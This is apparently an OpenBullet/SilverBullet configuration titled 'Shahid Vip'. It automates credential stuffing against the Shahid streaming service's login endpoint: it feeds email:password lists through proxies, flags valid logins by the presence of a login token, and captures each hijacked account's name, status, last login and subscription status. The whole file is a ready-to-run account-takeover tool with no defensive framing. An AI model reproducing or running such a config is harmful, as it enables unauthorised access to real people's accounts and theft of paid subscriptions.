[SETTINGS]
{
  "Name": "Shahid Vip",
  "SuggestedBots": 200,
  "MaxCPM": 0,
  "LastModified": "2022-02-19T11:31:25.668235+00:00",
  "AdditionalInfo": "",
  "RequiredPlugins": [],
  "Author": "𝔖𝔬𝔥𝔞𝔦𝔟 ⍢⃝🇯🇵",
  "Version": "1.1.2 [SB]",
  "SaveEmptyCaptures": false,
  "ContinueOnCustom": false,
  "SaveHitsToTextFile": false,
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": true,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "BanProxyAfterGoodStatus": false,
  "BanLoopEvasionOverride": -1,
  "EncodeData": false,
  "AllowedWordlist1": "MailPass",
  "AllowedWordlist2": "",
  "DataRules": [],
  "CustomInputs": [],
  "CaptchaUrl": "",
  "IsBase64": false,
  "FilterList": [],
  "EvaluateMathOCR": false,
  "SecurityProtocol": 0,
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "QuitOnBanRetry": false,
  "AcceptInsecureCertificates": true,
  "DisableNotifications": false,
  "DisableImageLoading": false,
  "DefaultProfileDirectory": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": "",
  "Title": "ShahidVip",
  "IconPath": "Icon\\svbfile.ico",
  "LicenseSource": null,
  "Message": null,
  "MessageColor": "#FFFFFFFF",
  "HitInfoFormat": "[{hit.Type}][{hit.Proxy}] {hit.Data} - [{hit.CapturedString}]",
  "AuthorColor": "#FFFFB266",
  "WordlistColor": "#FFB5C2E1",
  "BotsColor": "#FFA8FFFF",
  "CustomInputColor": "#FFD6C7C7",
  "CPMColor": "#FFFFFFFF",
  "ProgressColor": "#FFAD93E3",
  "HitsColor": "#FF66FF66",
  "CustomColor": "#FFFFB266",
  "ToCheckColor": "#FF7FFFD4",
  "FailsColor": "#FFFF3333",
  "RetriesColor": "#FFFFFF99",
  "OcrRateColor": "#FF4698FD",
  "ProxiesColor": "#FFFFFFFF"
}

[SCRIPT]
REQUEST POST "https://login.mbc.net/accounts.login" 
  CONTENT "loginID=<USER>&password=<PASS>&sessionExpiration=0&targetEnv=jssdk&include=profile%2Cdata&includeUserInfo=true&lang=en&APIKey=3_Pm0x4fe9XSy6gv04PewESwqZ_HLgUCbXwWWPHCbGmUGFbW1xyHa42dFt0XTVay0T&sdk=js_latest&authMode=cookie&pageURL=https%3A%2F%2Fshahid.mbc.net%2Fen%2Fothers-promo&format=json" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "referer: https://shahid.mbc.net/" 
  HEADER "sec-fetch-dest: empty" 
  HEADER "sec-fetch-mode: cors" 
  HEADER "sec-fetch-site: same-site" 
  HEADER "user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.67 Safari/537.36" 

KEYCHECK 
  KEYCHAIN Failure OR 
    KEY "invalid loginID or password" 
    KEY "Invalid LoginID" 
  KEYCHAIN Success OR 
    KEY "\"login_token\":" 

PARSE "<SOURCE>" JSON "firstName" CreateEmpty=FALSE -> CAP "FirstName" 

PARSE "<SOURCE>" JSON "lastName" CreateEmpty=FALSE -> CAP "LastName" 

PARSE "<SOURCE>" JSON "isActive" CreateEmpty=FALSE -> CAP "Status " 

PARSE "<SOURCE>" JSON "isExpiredSession" CreateEmpty=FALSE -> CAP "Expires In" 

PARSE "<SOURCE>" JSON "Last Updated" CreateEmpty=FALSE -> CAP "Last Updated" 

PARSE "<SOURCE>" JSON "lastLogin" CreateEmpty=FALSE -> CAP "Last Seen" 

PARSE "<SOURCE>" JSON "is_email_verified" CreateEmpty=FALSE -> CAP "EmailVerified" 

REQUEST GET "https://shahid.mbc.net/ar/widgets/manage-subscriptions" 
  
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 

PARSE "<SOURCE>" LR "settings_subscribed_status\":\"" "\"" CreateEmpty=FALSE -> CAP "Subscription" 

FUNCTION Constant "𝔖𝔬𝔥𝔞𝔦𝔟 ⍢⃝🇯🇵" -> CAP "Config By" 

